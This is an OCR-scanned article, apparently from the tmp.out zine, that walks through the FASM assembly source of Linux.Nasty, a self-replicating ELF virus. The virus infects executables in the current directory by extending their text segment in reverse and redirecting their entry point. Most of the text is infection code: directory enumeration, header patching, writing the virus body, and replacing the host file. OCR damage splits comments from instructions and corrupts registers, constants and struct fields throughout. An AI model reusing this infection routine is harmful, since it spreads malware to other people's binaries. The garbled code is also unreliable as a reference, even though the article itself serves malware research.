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Overview 


This code was originally published in the first issue of tmp.out zine - an ELF Research Group 
founded by me and a super talented group of friends in early 2021. This project was finished 
literally minutes before the deadline we set. Living on the edge! 


In general, it took me around a couple of months to complete it, most of the time was 
dedicated to its core infection routine since the auxiliary sections are common file I/O 
operations that I’m already familiar with. It was somewhat more challenging than 
Linux.Midrashim as the technique used here is not as trivial to implement and I want to 
thank everyone that helped me debug the final version. It was great to have those sessions 
with all of you, I learned a lot. 


This is the fruit of an internal project we had in mind back then. Create an Assembly version 
of the most common ELF infection techniques out there for demonstration and research 
purposes. 


e Linux.Midrashim was my first one (PT_NOTE -> PT_LOAD technique). 
e Linux.Nasty (Reverse Text Segment technique). 


As always (again), the payload is non-destructive, detection is easy and samples were shared 
with relevant AV companies before release. 


How it works 


Linux.Nasty is a 64 bits Linux infector that targets ELF files in the current directory (non 
recursively). It uses the Reverse Text Segment infection technique and will only work on 
regular ELF executables (the design of this method, unfortunately, prevents it from working 
with PIE). Quoting chapter 4 of the book Learning Linux Binary Analysis by Ryan elfmaster 
O’Neill, which is awesome and you should check it out: 


"The idea is that a virus or parasite can make room for its code by extending the text segment 
in reverse. The program header for the text segment will look strange if you know what you're 
looking for." 


Here’s the infected file layout (taken from the book mentioned above, slightly modified - full 
image): 
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Entry point transfers control to parasite 


Ox3ff000 | | 
ELF FILE HEADER 


PARASITE CODE 


TEXT SEGMENT JMP TO ENTRY 


PROGRAM HEADERS 


0x400000 
PROGRAM CODE 


DATA SEGMENT 


This project was inspired largely by elfmasters Skeksi but the algorithm is slightly modified. 
Also check the original paper by Silvio Cesare. 


Code 


The virus must be assembled with FASM x64 and its core functionality consists of: 


Reserving space on stack to store some values in memory; 

Using actual Assembly structs (not like in Linux.Midrashim where I simply used the 
stack without any Assembly syntax). Improves readability without affecting its 
functionality in general; 

Loop through files in the current directory, checking for targets for infection; 

Try to infect target file (map it to memory, check if it is a good candidate for infection, 
etc); 

Continue looping the directory until no more infection targets are available, then exit; 
The code could be somewhat unreliable as of time of writing because it was a bit rushed 
so you might need to fix a thing or two before using it on a different system much than 
the one I used for development (FASM 1.73.27 on Linux 5.11.14-gentoo). 


The full code with comments is available at https://github.com/guitmz/nasty and we'll now 
go over each step above with a bit more detail. 
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If you need help understanding Linux system calls parameters, feel free to visit my new 
(work in progress) website: https://syscall.sh and use the API I created recently, which you 
can find the documentation at https://api.syscall.sh/swagger/index.html. 


First things first 


For the stack buffer, I like to use the r15 register and add the comments below for 


reference when browsing the code. 


r13 
r14 
ris 
ris 
ris 
ris 
ris 


Ne Na Ne Na Na Nae Ne Ne 


Then we have the structs definitions, they will be loaded in the stack later with the help of the 


+ 
J 
a 
+ 


Stack buffer: 


target temp file fd 
target mmap addr 
STAT 

patched jmp to OEP 
DIRENT.d_name 
directory size 
DIRENT 


aforementioned r15 register. 
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struc DIRENT { 


} 


.d_ino 
.d_off 
.d_reclen 
.d_type 
label .d_name 


virtual at 0 


DIRENT DIRENT 
sizeof .DIRENT 


end virtual 


struc STAT { 


J 


.st_dev 
.St_ino 
.St_nlink 
.St_mode 
.St_uid 
.st_gid 

. pado 
.St_rdev 
.Sst_size 
.St_blksize 
.St_blocks 
.St_atime 
.St_atime_nsec 
.Sst_mtime 
.St_mtime_nsec 
.St_ctime 
.St_ctime_nsec 


virtual at 0 


STAT STAT 
sizeof.STAT = 


end virtual 


struc EHDR { 


.magic 
.Class 
.data 
.elfversion 
.OS 
.abiversion 
. pad 

. type 
.machine 
.version 
„entry 
.phoff 

. shof f 
.flags 
.ehsize 
.phentsize 
. phnum 
.shentsize 


=$ 


rq 1 
rq 1 
rw 1 
rb 1 
byte 


- DIRENT 


rq 
rq 
rq 
rd 
rd 
rd 
rb 
rq 
rq 
rq 
rq 
rq 
rq 
rq 
rq 
rq 
rq 


PRERPPBPRPEBEHEPEBP PAPE HEHE EE 


STAT 


NNNNARHEHRANNNEHBHEB BB 
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. shnum rb 2 
. shstrndx rb 2 
} 
virtual at 0 
EHDR EHDR 
sizeof.EHDR = $ - EHDR 
end virtual 


struc PHDR { 


. type rb 4 
.flags rd 1 
.offset rq 1 
.vaddr rq 1 
.paddr rq 1 
.filesz rq 1 
.memsz rq 1 
.align rq 1 
} 
virtual at 0 
PHDR PHDR 


sizeof.PHDR = $ - PHDR 
end virtual 


struc SHDR { 


. name rb 4 
. type rb 4 
. flags rq 1 
.addr rq í 
.offset rq 1 
.size rq 1 
. Link rb 4 
. info rb 4 
.addralign rq 1 
.entsize rq 1 
.hdr_size = $ - .name 

} 

virtual at 0 

SHDR SHDR 


sizeof.SHDR = $ - PHDR 
end virtual 


Let’s reserve the stack space. Going for 2000 bytes this time, then pointing rsp to ri5. 


sub rsp, 2000 ; reserving 2000 bytes 
mov r15, rsp ; r15 has the reserved stack buffer address 


There are no mechanisms to detect the first execution (first generation) of the virus in 
Linux.Nasty. I had no time to do anything cool and didn’t feel like reusing stuff from other 
projects. 


Target acquired 
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Finding infection targets is nothing special, the code is largely the same (at least the logic is 
very similar) in most of my projects. We open the current directory in read mode with 
getdents64 syscall, which will return the number of entries in it. That goes into the stack 


buffer. 


Interesting fact: according to Linus, this syscall is very expensive. 


The locking is such that only one process can be reading a given directory at any given time. If 


that process must wait for disk I/O, it sleeps holding the inode semaphore and blocks all other 


readers - even if some of theothers could work with parts of the directory which are already in 


memory. 


Why kernel.org is slow 


load_dir: 
push "." 
mov rdi, rsp 
mov rsi, O_RDONLY 
xor rdx, rdx 
mov rax, SYS_OPEN 
syscall 


mov r8, rax 


mov rdi, rax 

lea rsi, [r15 + 600 + DIRENT] 
mov rdx, DIRENT_BUFSIZE 

mov rax, SYS_GETDENTS64 
syscall 


mov r9, rax 


mov rdi, r8 
mov rax, SYS_CLOSE 
syscall 


test r9, r9 
js cleanup 
should exit 


mov qword [r15 + 500], r9 
xor Trex; rcx 


1 


d 


pushing "." to stack (rsp) 
moving "." to rdi 


not using any flags 

rax contains the fd 

mov fd to r8 temporarily 
move fd to rdi 


rsi = dirent in stack 
buffer with maximum directory size 


r9 now contains the directory entries 


load open dir fd from r8 
close source fd in rdi 


check directory list was successful 
if negative code is returned, I failed and 


[r15 + 500] now holds directory size 


; will be the position in the directory entries 


Looping through files in the current directory looks like this. - Open a file (read/write mode); 
- Copy its file name to the stack buffer; - If the file cannot be opened, skip it and try the next 


one. 
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file_loop: 
push rcx 
(important, used as counter for dirent record length) 
cmp [rcx + r15 + 600 + DIRENT.d_type], DT_REG 
file dirent.d_type 
jne .continue 
file 


.open_target: 

push rcx 

lea rdi, [rcx + r15 + 600 + DIRENT.d_name] 
stack 

mov rsi, O_RDWR 
write mode 

xor rdx, rdx 

mov rax, SYS_OPEN 

syscall 


test rax, rax 
next one 
js .continue 


preserving rcx 
check if it's a regular 


if not, proceed to next 


dirent.d_name from 
opening target in read 


not using any flags 


if can't open file, try 


this also kinda 


prevents self infection since you cannot open a running file in write mode (which 


will happen during first execution) 


mov r8, rax 
from rax 
xor rax, rax 
used to copy host filename to stack buffer 


pop rcx 
lea rsi, [rcx + r15 + 600 + DIRENT.d_name] 

source index 
lea rdi, [r15 + 200] 

destination index (that is in stack buffer at [r15 + 200]) 


.copy_host_name: 
mov al, [rsi] 
rsi to al 
inc rsi 
rsi 
mov [rdi], al 
address in rdi 


inc rdi 
rdi 

cmp al, 0 
zero 

jne .copy_host_name 
byte if not 


.continue: 
pop rcx 
counter for directory length 
add cx, [rcx + r15 + 600 + DIRENT.d_reclen] 
length to cx (lower rcx, for word) 


load r8 with source fd 


clearing rax, will be 


put address into the 


put address into the 


copy byte at address in 
increment address in 
copy byte in al to 
increment address in 
see if its an ascii 


jump back and read next 


restore rcx, used as 


adding directory record 


7/17 


cmp rcx, qword [r15 + 500] ; comparing rcx counter 
with directory records total size 

jne file_loop ; if counter is not the 
same, continue loop 


The target file is then mapped to memory for further checks and/or manipulation. - Get file 
information with fstat ;- Map the file with mmap ; - Check if the file is a valid ELF x86_64 
binary; - Check if the file is already infected. 
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.map_target: 
mov rdi, r8 
lea rsi, [r15 + STAT] 
mov rax, SYS_FSTAT 
syscall 


conntains target file information 


xor rdi, rdi 
choose mapping destination 


mov rsi, [r15 + STAT.st_size] 


from fstat.st_size in stack 


mov rdx, PROT_READ or PROT_WRITE 


(0x01) | PROT_WRITE (0x02) 
mov r10, MAP_PRIVATE 
xor r9, r9 


(zero means start of source file) 


mov rax, SYS_MMAP 
syscall 
mapped location 


push rax 
mov rdi, r8 
mov rax, SYS_CLOSE 
syscall 
pop rax 
stack 


test rax, rax 
js .continue 


.is_elf: 


cmp [rax + EHDR.magic], 0x464c457f 


(dword, little-endian) 
jnz .continue 


and continue to next file if any 


.is_64: 


cmp [rax + EHDR.class], ELFCLASS64 


64bit 
jne .continue 


cmp [rax + EHDR.machine], EM_X86_64 


x86_64 architechture 
jne .continue 


.is_infected: 


cmp dword [rax + EHDR. pad], 


0x005a4d54 


load source fd to rdi 
load fstat struct to rsi 


fstat struct in stack 


operating system will 
load rsi with file size 
protect RW = PROT_READ 
pages will be private 
offset inside source file 


now rax will point to 


push mmap addr to stack 

rdi is now target fd 

close source fd in rdi 
restore mmap addr from 

test if mmap was successful 
skip file if not 


0x464c457F means .ELF 


not an ELF binary, close 


check if target ELF is 


skipt it if not 
check if target ELF is 


skip it if not 


; check signature in ehdr.pad 


(TMZ in little-endian, plus trailing zero to fill up a word size) 


jz .continue 


continue to next file if any 


If all checks pass, calls infect routine. 


.infection_candidate: 


call infect ; calls infection routine 


; already infected, close and 
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Crafting something great 


Here lies the core part of the code. 


It starts by loading r9 to the Program Headers offset based on rax (I move this to r14 
to make it easier to use since rax is required for a bunch of other operations), which now 
points to the base address of the memory mapped target file. 


r12 points to the Section Headers offset. 


infect: 

push rbp ; save the stack frame of the caller 

mov rbp, rsp ; save the stack pointer 

mov r14, rax ; r14 = pointer to target bytes (memory map 
address) 

mov r9, [r14 + EHDR.phoff] ; set r9 to offset of PHDRs 

mov r12, [r14 + EHDR.shoff] ; set r12 to offset of SHDRs 

xor rbx, rbx ; initializing phdr loop counter in rbx 

xor rcx, rcx ; initializing shdr loop counter in rdx 


For each program header, some checks are performed. We need to patch all phdrs and the 
.text segment requires special attention. 


We assume PAGE_SIZE to be 4096 bytes here but ideally it should be calculated 
dynamically. 


First, verify if its type is PT_LOAD :-ifyes,isitthe .text segment? - if we got it, patch it 
following the Reverse Text Segment method, slightly modified in this case for 
demonstration: - p_vaddr is decreased by 2 * PAGE_SIZE ;- p_filesz is increased by 

2 * PAGE_SIZE ;- p_memsz isincreased by 2 * PAGE_SIZE ;- p_offset is decreased 
by PAGE_SIZE ; - if not, we just increase this header p_offset by PAGE_SIZE . 
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.loop_phdr: 
cmp [r14 + r9 + PHDR.type], 
jnz .not_txt_segment 


PT_LOAD 


cmp [r14 + r9 + PHDR.flags], PF_R or PF_X 
segment 


jnz .not_txt_segment 


.txt_segment: 


sub [r14 + r9 + PHDR.vaddr], 2 * PAGE_SIZE 


PAGE_SIZE 

add [r14 + r9 + PHDR.filesz], 2 * PAGE_SIZE 
PAGE_SIZE 

add [r14 + r9 + PHDR.memsz], 2 * PAGE_SIZE 
PAGE_SIZE 

sub [r14 + r9 + PHDR.offset], PAGE_SIZE 
PAGE_SIZE 

mov r8, [ri4 + r9 + PHDR.vaddr] 


patched vaddr, will be used to patch entrypoint 
jmp .next_phdr 


-not_txt_segment: 


add [r14 + r9 + PHDR.offset], PAGE_SIZE 


that are not the .text segment (increase by PAGE_SIZE) 


.next_phdr: 

inc bx 

cmp bx, word [r14 + EHDR.phnum] 
all phdrs already 

jge .loop_shdr 


add r9w, word [r14 + EHDR.phentsize] 
ehdr.phentsize into r9w 
jnz .loop_phdr 


check if phdr.type is PT_LOAD 
if not, patch it as needed 


check if PT_LOAD is text 


if not, patch it as needed 


decrease p_vaddr by 2 times 
increase p_filesz by 2 times 
increase p_memsz by 2 times 
decrease p_offset by 


contains .text segment 


proceed to next phdr 


patching p_offset of phdrs 


increase phdr bx counter 
check if we looped through 


exit loop if yes 
add current 


otherwise, 


read next phdr 


Section headers also require their offsets to be increased by PAGE_SIZE . Let’s do this now. 


. lLoop_shdr: 


add [r14 + r12 + SHDR.offset], PAGE_SIZE ; 


increase shdr.offset by PAGE_SIZE 


.next_shdr: 

inc cx ; increase shdr cx counter 

cmp cx, word [r14 + EHDR.shnum] ; check if we looped through all 
shdrs already 

jge .create_temp_file ; exit loop if yes 

add ri2w, word [r14 + EHDR.shentsize] ; otherwise, add current 
ehdr.shentsize into ri2w 

jnz .loop_shdr ; read next shdr 


Before continuing with patching the ELF header, we create a temporary file named 
.nty.tmp which will contain our final infected target. There are other ways to do this, 


explore at your leisure. 
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.create_temp_file: 


push 0 
mov rax, 0x706d742e79746e2e H 
push rax ; 


but it's for demonstration only 


mov rdi, rsp 


mov rsi, 7550 : 
mov rax, SYS_CREAT n 
syscall 

test rax, rax R 
js .infect_fail ; 


should exit 


mov r13, rax ; 


pushing ".nty.tmp\0" to stack 
this will be the temporary file name, not great 


-rw-r--r-- 
creating temporary file 


check if temporary file creation worked 
if negative code is returned, I failed and 


r13 now contains temporary file fd 


Patching the ELF header is trivial here, we account for the phdrs and shdrs changes 
made earlier. Increasing phoff and shoff by PAGE_SIZE willdo. 


The infection signature is then added and the entry point is modified to point to the patched 


.text segment. 


As an empty temporary file was already created, the patched ehdr is now going to be 


written to it at position oO. 


.patch_ehdr: 
mov r10, [r14 + EHDR.entry] 


add [r14 + EHDR.phoff], PAGE_SIZE 
add [r14 + EHDR.shoff], PAGE_SIZE 


; set host OEP to r10 


; increment ehdr->phoff by PAGE_SIZE 
; increment ehdr->shoff by PAGE_SIZE 


mov dword [r14 + EHDR.pad], 0x005a4d54 ; add signature in ehdr.pad (TMZ in 
little-endian, plus trailing zero to fill up a word size) 


add r8, EHDR_SIZE 
segment vaddr) 
mov [r14 + EHDR.entry], r8 


mov rdi, r13 

mov rsi, r14 

mov rdx, EHDR_SIZE 
mov rax, SYS_WRITE 
syscall 


cmp rax, 0 
jbe .infect_fail 


; add EHDR size to r8 (patched .text 
; set new EP to value of r8 


; target fd from r13 

; mmap *buff from r14 

; sizeof ehdr 

; write patched ehdr to target host 


Right after the ehdr , the virus body is added to the temporary file. 
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.write_virus_body: 
call .delta ; 
.delta: 
pop rax 
sub rax, .delta 


mov rdi, r13 ; 
lea rsi, [rax + v_start] 
mov rdx, V_SIZE ; 
mov rax, SYS_WRITE 


syscall 


cmp rax, 0 
jbe .infect_fail 


the age old trick 


target temporary fd from r13 
load *v_start 
virus body size 


Additionally, a way to give control back to the original target code is required, so a small 
jmp is added (in this case, it’s a push/ret ), which will do just that after the virus 


execution finishes on an infected file. 


.write_patched_jmp: 
mov byte [r15 + 150], 0x68 
"push addr" and "ret") 
mov dword [r15 + 151], r10d 
host EP instruction 
mov byte [r15 + 155], Oxc3 
execution, before host takes control 


mov rdi, r13 

lea rsi, [r15 + 150] 
[r15 + 150] 

mov rdx, 6 

mov rax, SYS_WRITE 

syscall 


The original host code (minus its ehdr 


PAGE_SIZE used as padding. The length of the code above (6 bytes) also has to be taken into 


consideration in this step. 


; 68 XX XX XX XX c3 (this is the opcode for 
; on the stack buffer, prepare the jmp to 

; this is the last thing to run after virus 
; r9 contains fd 

; rsi = patched push/ret in stack buffer = 


; size of push/ret 


) can now be placed into the temporary file with 


13/17 


.write_everything_else: 


mov rdi, 
mov rsi, 
sub rsi, 
mov rdx, 
mov rax, 


r13 
PAGE_SIZE 
V_SIZE + 6 
SEEK_CUR 
SYS_LSEEK 


PAGE_SIZE + 6 bytes 


syscall 


mov rdi, 
lea rsi, 
mov rdx, 
sub rdx, 
already have 
mov rax, 
syscall 


mov rax, 
syscall 


ris 

[r14 + EHDR_SIZE] 
[r15 + STAT.st_size] 
EHDR_SIZE 

written an EHDR) 
SYS_WRITE 


SYS_SYNC 


get temporary fd from r13 
rsi = PAGE_SIZE + sizeof(push/ret) 


moves fd pointer to position right after 


start from after ehdr on target host 
get size of host file from stack 
subtract EHDR size from it (Since we 


; write rest of host file to temporary file 


commiting filesystem caches to disk 


To finish the infection routine, the target file is unmapped from memory and the crafted 
temporary file is closed. 


The temporary file is renamed to match the target file name and the routine will return to a 


previous address to execute the payload and some final cleanup code. 
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.end: 
mov rdi, r14 
mov rsi, [r15 + STAT.st_size] 
mov rax, SYS _MUNMAP 
syscall 


mov rdi, r13 
mov rax, SYS_CLOSE 
syscall 


push 0 
mov rax, 0x706d742e79746e2e 
push rax 

done in a better way :) 


mov rdi, rsp 
rdi 
lea rsi, [r15 + 200] 
name from stack buffer 
mov rax, SYS_RENAME 
(sort of like "mv tmp_file host_file") 
syscall 


mov rax, © 

to zero as marker 
mov rsp, rbp 
pop rbp 
jmp .infect_ret 


.infect_fail: 
mov rax, 1 

marker 

.infect_ret: 
ret 


Ciao 


gets mmap address from r14 into rdi 
gets size of host file from stack buffer 
unmapping memory buffer 


rdi is now temporary file fd 
close temporary file fd 


pushing ".nty.tmp\0" to stack 

as you know by now, this should have been 
get temporary file name from stack into 
sets rsi to the address of the host file 


replace host file with temporary file 


infection seems to have worked, set rax 
restore the stack pointer 


restore the caller's stack frame 
returns with success 


infection falied, set rax to 1 and as 


The payload consists of a simple text message, displayed to stdout . Nothing else. 


Afterwards, the virus will “give back” the bytes it reserved in the beginning of its code, clear 


rdx register (because ABI), and exit. 
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call payload ; by calling payload label, we set msg label address on 
stack 
msg: 
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x20, 0x62, 0x79, Ox20, 0x54, Ox4d, Ox5a, 0x20, 
0x28, 0x63, 0x29, 0x20, 0x32, 0x30, 0x32, 0x31, Ox0a, 0x0a 
db 0x4e, 0x61, 0x73, 0x74, 0x79, Ox2c, 0x20, Ox6e, Ox61, 0x73, 0x74, 0x79, 0x0a 
db 0x54, 0x72, 0x69, 0x70, Ox6c, 0x65, 0x20, 0x58, 0x20, 0x72, 0x61, 0x74, 0x65, 
0x64, Ox0a 
db 0x4e, 0x61, 0x73, 0x74, 0x79, Ox2c, 0x20, Ox6e, Ox61, 0x73, 0x74, 0x79, 0x0a 
db 0x4a, 0x75, 0x73, 0x74, 0x69, 0x63, 0x65, Ox2c, 0x20, 0x61, 0x20, 0x77, 0x61, 
0x73, 0x74, 0x65, 0x2d, 0x70, 0x69, 0x74, Ox0a 
db 0x4e, 0x61, 0x73, 0x74, 0x79, Ox2c, 0x20, Ox6e, Ox61, 0x73, 0x74, 0x79, Ox0a 
db 0x44, 0x65, 0x65, 0x70, 0x65, 0x72, 0x20, 0x69, Ox6e, 0x20, 0x74, 0x68, 0x65, 
0x20, 0x64, 0x69, 0x72, 0x74, Ox0a 
db 0x4e, 0x61, 0x73, 0x74, 0x79, Ox2c, 0x20, Ox6e, Ox61, 0x73, 0x74, 0x79, Ox0a 
db 0x4d, 0x61, Ox6b, 0x69, Ox6e, 0x67, 0x20, 0x62, Ox6f, 0x64, 0x69, 0x65, 0x73, 
0x20, 0x68, 0x75, 0x72, 0x74, OxO0a, Ox0a 


len = $-msg 
payload: 

pop rsi ; gets msg address from stack into rsi 

mov rax, SYS_WRITE 

mov rdi, STDOUT ; display payload 

mov rdx, len 

syscall 

jmp cleanup ; finishes execution 
cleanup: 

add rsp, 2000 ; restoring stack so host process can run normally, this 
also could use some improvement 

xor rdx, rdx ; Clearing rdx before giving control to host (rdx a 


function pointer that the application should register with atexit - from x64 ABI) 
v_stop: 
xor rdi, rdi ; exit code 0 


mov rax, SYS_EXIT 
syscall 


Outro 


This was such an amazing project. Not only I was able to learn even more about the ELF 
format, but I also had people that I respect and admire involved. 


This post was also delayed for quite a bit, our zine even had a second release by now. I am so 
proud of it and I hope that tmp.out continues to thrive and gather people from all around the 
world that wants to share knowledge and, more importantly, have fun. 


TMZ 
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